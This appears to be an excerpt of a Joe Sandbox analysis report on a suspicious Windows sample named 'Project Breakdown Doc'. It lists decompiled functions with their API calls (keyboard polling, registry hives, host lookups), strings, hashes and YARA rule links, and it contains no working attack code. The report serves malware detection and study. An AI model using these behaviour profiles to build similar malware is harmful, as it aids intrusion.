                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 85808e2bdc65ea75e762ddf39b9f3716759d833da917dcc54b8eb554b2721809
                                                  • Instruction ID: 5a6c5ce76d4ed548a471715d9101f8d486b6827c62553c11f5675918160310bf
                                                  • Opcode Fuzzy Hash: 85808e2bdc65ea75e762ddf39b9f3716759d833da917dcc54b8eb554b2721809
                                                  • Instruction Fuzzy Hash: 57415E7011424E9BCF20EF91D891AEF3724BF12350F684558FEA16B292DB30AE1ADB51
                                                  Function 00CA5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                    • Part of subcall function 00C47A84: _memmove.LIBCMT ref: 00C47B0D
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CA55D2
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CA55E8
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA55F9
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CA560B
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CA561C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: d812bc42bc13089c7f20416c3a6d4bf3848f4ef2fea959fb6422f8d32a90a3cb
                                                  • Instruction ID: ffc0de50b3191a64c093d31d94a5d3c5558d0a8f0ae7709ea14697ae195173e6
                                                  • Opcode Fuzzy Hash: d812bc42bc13089c7f20416c3a6d4bf3848f4ef2fea959fb6422f8d32a90a3cb
                                                  • Instruction Fuzzy Hash: 4D119460A5056E79D720B761CC8ADFFBB7CFF92B00F400569B515A30E1DF605E09D6A2
                                                  Function 00CA48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 869098cb062e91c5c1d4d97a1ca4aaf576ea4abb0bf779d5362ab4400048ae6e
                                                  • Instruction ID: b38cfa3242a18e80926e278e2d02568ba22a97c9b68425416ec167c490674ee1
                                                  • Opcode Fuzzy Hash: 869098cb062e91c5c1d4d97a1ca4aaf576ea4abb0bf779d5362ab4400048ae6e
                                                  • Instruction Fuzzy Hash: E611D531904115AFCB34EB74DC46FDF77AC9B42714F04417AF405D6091EFB19A829651
                                                  Function 00CA5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00CA521C
                                                    • Part of subcall function 00C60719: timeGetTime.WINMM(?,75C0B400,00C50FF9), ref: 00C6071D
                                                  • Sleep.KERNEL32(0000000A), ref: 00CA5248
                                                  • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00CA526C
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CA528E
                                                  • SetActiveWindow.USER32 ref: 00CA52AD
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CA52BB
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CA52DA
                                                  • Sleep.KERNEL32(000000FA), ref: 00CA52E5
                                                  • IsWindow.USER32 ref: 00CA52F1
                                                  • EndDialog.USER32(00000000), ref: 00CA5302
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 15dccde510e1f7344d98982eca078d68f8545cdd18ea5a4db9229e66cb88e8d5
                                                  • Instruction ID: 4e6d5010116ed402281ffd8a2cc504113293da7d85b7a603bac38e05df39e143
                                                  • Opcode Fuzzy Hash: 15dccde510e1f7344d98982eca078d68f8545cdd18ea5a4db9229e66cb88e8d5
                                                  • Instruction Fuzzy Hash: 6F21A170204B46BFE7005B30EC8CF6E3B6AEB8634AF045438F109C62B1CBA1AD519B31
                                                  Function 00CAD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • CoInitialize.OLE32(00000000), ref: 00CAD855
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CAD8E8
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00CAD8FC
                                                  • CoCreateInstance.OLE32(00CD2D7C,00000000,00000001,00CFA89C,?), ref: 00CAD948
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CAD9B7
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00CADA0F
                                                  • _memset.LIBCMT ref: 00CADA4C
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00CADA88
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CADAAB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00CADAB2
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CADAE9
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00CADAEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 6eeb2982e3c8217881455a2eaac49f7b771a3c23479554ab8b6a77547d0821c6
                                                  • Instruction ID: 849132a1dacf98422a0547958fd4cc3f7bcc12673b36325901c690074d377cf4
                                                  • Opcode Fuzzy Hash: 6eeb2982e3c8217881455a2eaac49f7b771a3c23479554ab8b6a77547d0821c6
                                                  • Instruction Fuzzy Hash: CDB10F75A00119AFDB14DFA4C888EAEBBF9FF49304B148469F50AEB251DB30EE45DB50
                                                  Function 00CA052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00CA05A7
                                                  • SetKeyboardState.USER32(?), ref: 00CA0612
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00CA0632
                                                  • GetKeyState.USER32(000000A0), ref: 00CA0649
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00CA0678
                                                  • GetKeyState.USER32(000000A1), ref: 00CA0689
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00CA06B5
                                                  • GetKeyState.USER32(00000011), ref: 00CA06C3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00CA06EC
                                                  • GetKeyState.USER32(00000012), ref: 00CA06FA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00CA0723
                                                  • GetKeyState.USER32(0000005B), ref: 00CA0731
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 410638af85a4cdf7a9dc6b1c7984f5d03331602e406771340a03f19a6818b71b
                                                  • Instruction ID: a7ee84b5411e068592fff5b2531f073db6bbc0897037198195201b1344db9359
                                                  • Opcode Fuzzy Hash: 410638af85a4cdf7a9dc6b1c7984f5d03331602e406771340a03f19a6818b71b
                                                  • Instruction Fuzzy Hash: 8A51DB20E0478619FB35DBA088547EEBFB49F033C8F18459DD9D25B1C2DA64AB4CCB55
                                                  Function 00C9C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00C9C746
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C9C758
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C9C7B6
                                                  • GetDlgItem.USER32(?,00000002), ref: 00C9C7C1
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C9C7D3
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C9C827
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C9C835
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C9C846
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C9C889
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C9C897
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C9C8B4
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9C8C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 9581392b446e56177b35f1feedde3fb46e7f71e618c29bd08378fff473cf37f6
                                                  • Instruction ID: 2878ca26a26d9ce32d1df773a9d1caaf502ad5f949464a41b433271d9f5a1986
                                                  • Opcode Fuzzy Hash: 9581392b446e56177b35f1feedde3fb46e7f71e618c29bd08378fff473cf37f6
                                                  • Instruction Fuzzy Hash: 51512D71B00205ABDF18CFA9DD99FAEBBBAEB88711F14812DF516D7290D7709E018B50
                                                  Function 00C4201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C41B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C42036,?,00000000,?,?,?,?,00C416CB,00000000,?), ref: 00C41B9A
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C420D3
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C4216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00C7BEF6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C7BF27
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C7BF3E
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C416CB,00000000,?,?,00C41AE2,?,?), ref: 00C7BF5A
                                                  • DeleteObject.GDI32(00000000), ref: 00C7BF6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 889cac8b66d07c9029870196cbb8887b9619a9bdad29584d43a139da1021d26c
                                                  • Instruction ID: 3ec48ab31ee9ad79ce468e7b049b85d55427e8e598ab878390251cbf65b572ff
                                                  • Opcode Fuzzy Hash: 889cac8b66d07c9029870196cbb8887b9619a9bdad29584d43a139da1021d26c
                                                  • Instruction Fuzzy Hash: F3618534500710DFCB259F15CD4AB2AB7F2FB50716F90842DE55A8BAA0C771AEA1DFA0
                                                  Function 00C421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C425DB: GetWindowLongW.USER32(?,000000EB), ref: 00C425EC
                                                  • GetSysColor.USER32(0000000F), ref: 00C421D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 30cc1e27ada8762b1cdb5a0229ec296081bb40fcf0fc2e747c5cef8896848b27
                                                  • Instruction ID: 5603339386514969dff7e410dab9cb45c95e7022c15d79e781b8364e32728b63
                                                  • Opcode Fuzzy Hash: 30cc1e27ada8762b1cdb5a0229ec296081bb40fcf0fc2e747c5cef8896848b27
                                                  • Instruction Fuzzy Hash: 2C41A2311001509FDB255F28EC89BBD3B66FB06331F988269FE758A1E2C7718D42DB61
                                                  Function 00CAAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00CCF910), ref: 00CAAB76
                                                  • GetDriveTypeW.KERNEL32(00000061,00CFA620,00000061), ref: 00CAAC40
                                                  • _wcscpy.LIBCMT ref: 00CAAC6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: bea861608499c00d907970325fc572a2fcdd12f391487ccef6f1a3e4a7c91598
                                                  • Instruction ID: 965d689703685bf3a26eadf334928f1add1989283b54d3c8a161e094445bebb2
                                                  • Opcode Fuzzy Hash: bea861608499c00d907970325fc572a2fcdd12f391487ccef6f1a3e4a7c91598
                                                  • Instruction Fuzzy Hash: 3951BF701083069BC720EF14D881AAFB7A5FF85318F14492DF596972A2DB31DE09DB53
                                                  Function 00C49997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 1374084c81780bb8e40fbca86e219989fda6e02fcd906ac55d90621bb718c864
                                                  • Instruction ID: 3afe018d9ee17f81a1d863179ece29b5c22702db3d7e3e9214c1e54a673c8229
                                                  • Opcode Fuzzy Hash: 1374084c81780bb8e40fbca86e219989fda6e02fcd906ac55d90621bb718c864
                                                  • Instruction Fuzzy Hash: B641F571604215AFDB34EF79D882E7BB7E8FB44300F20846EE64DD7291EA319942EB11
                                                  Function 00CC73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CC73D9
                                                  • CreateMenu.USER32 ref: 00CC73F4
                                                  • SetMenu.USER32(?,00000000), ref: 00CC7403
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC7490
                                                  • IsMenu.USER32(?), ref: 00CC74A6
                                                  • CreatePopupMenu.USER32 ref: 00CC74B0
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC74DD
                                                  • DrawMenuBar.USER32 ref: 00CC74E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 74fa9036c3751556e74bceebd5b6ad28120fc904d37e7b47260565e9208412c1
                                                  • Instruction ID: 18b8706dbb7efa0070d31a3cd98388e8dcc81ff0bc028dafa811646b9489b35b
                                                  • Opcode Fuzzy Hash: 74fa9036c3751556e74bceebd5b6ad28120fc904d37e7b47260565e9208412c1
                                                  • Instruction Fuzzy Hash: DF412575A00209EFDB24DF64D884F9ABBB9FF49310F14412DEA5597360DB31AA20DF60
                                                  Function 00CC772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CC77CD
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00CC77D4
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CC77E7
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00CC77EF
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CC77FA
                                                  • DeleteDC.GDI32(00000000), ref: 00CC7803
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00CC780D
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CC7821
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CC782D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 2d3ea5dc646cc436d58d0fd1c64a3cb576be740a4ebfd80119063cbdc839270b
                                                  • Instruction ID: 172be2d705fae1c7b98778e3d2910ea642ee2fe86db62f328debabb8d22521dc
                                                  • Opcode Fuzzy Hash: 2d3ea5dc646cc436d58d0fd1c64a3cb576be740a4ebfd80119063cbdc839270b
                                                  • Instruction Fuzzy Hash: C8316D31105219ABDF129FA4DC09FDE3B6AFF09724F110329FA65A61E0C731D862DBA4
                                                  Function 00C67040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6707B
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  • __gmtime64_s.LIBCMT ref: 00C67114
                                                  • __gmtime64_s.LIBCMT ref: 00C6714A
                                                  • __gmtime64_s.LIBCMT ref: 00C67167
                                                  • __allrem.LIBCMT ref: 00C671BD
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C671D9
                                                  • __allrem.LIBCMT ref: 00C671F0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C6720E
                                                  • __allrem.LIBCMT ref: 00C67225
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C67243
                                                  • __invoke_watson.LIBCMT ref: 00C672B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction ID: 4158b80275f823ed9b0a436b08ebc1273844220a299b29a3c1ed0f8473d1b480
                                                  • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
